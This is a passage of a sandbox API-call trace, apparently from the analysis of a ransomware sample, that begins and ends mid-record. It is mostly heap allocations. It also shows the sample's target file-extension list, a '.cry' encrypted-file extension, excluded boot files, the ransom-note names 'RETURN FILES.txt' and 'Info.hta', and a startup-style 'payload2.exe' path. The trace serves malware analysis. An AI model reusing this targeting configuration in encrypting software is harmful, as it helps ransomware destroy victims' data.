Flags=0x0, Size=0xc) returned 0x639e08 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639e20 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639e38 [0033.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639e50 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639e68 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639e80 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639e98 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639eb0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639ec8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639ee0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639ef8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639f10 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x635468 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639f28 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639f40 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639f58 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x63a148 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639f70 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x639f88 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639fa0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639fb8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639fd0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x639fe8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a000 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a018 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x63a030 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x63a048 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a060 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a078 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a090 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x63a0a8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a0c0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a0d8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a0f0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x63a108 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c5e8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c600 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c618 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x63a158 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x63a168 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c630 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c648 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c660 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c678 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c690 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64c6a8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c6c0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c6d8 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c6f0 [0033.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c708 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64c720 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c738 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c750 [0033.661] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639318, Size=0x400) returned 0x639318 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c768 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c780 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64c798 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c7b0 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c7c8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c7e0 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64c7f8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c810 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c828 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c840 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x63a178 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c858 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64c870 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c888 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c8a0 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c8b8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c8d0 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x64c8e8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c900 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c918 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c930 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c948 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c960 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c978 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c990 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c9a8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x63a188 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64c9e8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ca00 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ca18 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ca30 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ca48 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ca60 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ca78 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ca90 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64caa8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x64cac0 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cad8 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x64caf0 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cb08 [0033.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cb20 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cb38 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cb50 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cb68 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64cb80 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cb98 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cbb0 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cbc8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cbe0 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cbf8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cc10 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cc28 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cc40 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cc58 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cc70 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cc88 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cca0 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ccb8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ccd0 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cce8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cd00 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cd18 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x64cd30 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12) returned 0x636080 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cd48 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cd60 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cd78 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cd90 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cda8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cde8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ce00 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ce18 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ce30 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ce48 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ce60 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ce78 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ce90 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cea8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cec0 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64ced8 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cef0 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cf08 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cf20 [0033.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cf38 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64cf50 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64cf68 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64cf80 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x64cf98 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64cfb0 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x63a198 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cfc8 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x63a1a8 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cfe0 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64cff8 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d010 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64d028 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64d040 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d058 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64d070 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d088 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d0a0 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64d0b8 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d0d0 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64d0e8 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x64d100 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d118 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x63a1b8 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d130 [0033.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa) returned 0x64d148 [0033.663] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x639318, Size=0x800) returned 0x64d5d0 [0033.663] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0033.663] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b5c8 | out: hHeap=0x600000) returned 1 [0033.663] lstrlenW (lpString="") returned 0 [0033.663] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64df10 | out: hHeap=0x600000) returned 1 [0033.663] lstrlenW (lpString=".cry") returned 4 [0033.663] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6148d0, Size=0x8) returned 0x6148d0 [0033.664] lstrlenW (lpString=".cry") returned 4 [0033.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64df10 | out: hHeap=0x600000) returned 1 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64df40, Size=0x20) returned 0x6144f0 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144f0, Size=0x40) returned 0x636c00 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636c00, Size=0x80) returned 0x65b5d0 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a228, Size=0x8) returned 0x63a238 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a238, Size=0x10) returned 0x64df40 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64df40, Size=0x20) returned 0x6144c8 [0033.664] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0033.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b5d0 | out: hHeap=0x600000) returned 1 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64df70, Size=0x20) returned 0x635ab0 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635ab0, Size=0x40) returned 0x636c00 [0033.664] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0033.664] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0033.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x636c00 | out: hHeap=0x600000) returned 1 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64df70, Size=0x20) returned 0x635ab0 [0033.664] lstrlenW (lpString="Info.hta") returned 8 [0033.664] lstrlenW (lpString="Info.hta") returned 8 [0033.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ab0 | out: hHeap=0x600000) returned 1 [0033.664] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x66d5c0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 0x67 [0033.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66d5c0 | out: hHeap=0x600000) returned 1 [0033.664] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144c8, Size=0x40) returned 0x636c00 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64df70, Size=0x20) returned 0x6144c8 [0033.664] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64df70, Size=0x20) returned 0x635ab0 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635ab0, Size=0x40) returned 0x636c48 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636c48, Size=0x80) returned 0x65b5d0 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x64b658 [0033.665] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b658 | out: hHeap=0x600000) returned 1 [0033.665] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x66d5c0, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0033.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67d5c8 | out: hHeap=0x600000) returned 1 [0033.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66d5c0 | out: hHeap=0x600000) returned 1 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a238, Size=0x8) returned 0x63a228 [0033.665] lstrlenW (lpString="%windir%;") returned 9 [0033.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144c8 | out: hHeap=0x600000) returned 1 [0033.665] lstrlenW (lpString="C:\\Windows;") returned 11 [0033.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65d5b8 | out: hHeap=0x600000) returned 1 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64df88, Size=0x20) returned 0x6144c8 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144c8, Size=0x40) returned 0x636c48 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636c48, Size=0x80) returned 0x65b5d0 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x64b658 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a268, Size=0x8) returned 0x63a278 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a278, Size=0x10) returned 0x64dfd0 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64dfd0, Size=0x20) returned 0x6144c8 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a238, Size=0x8) returned 0x63a278 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a248, Size=0x8) returned 0x63a238 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a268, Size=0x8) returned 0x63a288 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a288, Size=0x10) returned 0x64e078 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64e078, Size=0x20) returned 0x635ab0 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a278, Size=0x10) returned 0x64e078 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a238, Size=0x10) returned 0x64e0a8 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a278, Size=0x8) returned 0x63a268 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a298, Size=0x8) returned 0x63a2a8 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64e078, Size=0x20) returned 0x635a60 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64e0a8, Size=0x20) returned 0x6359c0 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a2b8, Size=0x8) returned 0x63a2c8 [0033.665] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0033.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64b658 | out: hHeap=0x600000) returned 1 [0033.665] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64e120, Size=0x20) returned 0x635ad8 [0033.666] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x65d5b8, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0033.666] lstrlenW (lpString="C:\\") returned 3 [0033.666] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0033.666] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65d5b8 | out: hHeap=0x600000) returned 1 [0033.666] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a2f8, Size=0x82) returned 0x64bbc0 [0033.666] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x63a318, Size=0x100) returned 0x64bc50 [0033.666] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x64bd58, Size=0x104) returned 0x64be78 [0033.666] RtlReAllocateHeap (Heap=0x600000, 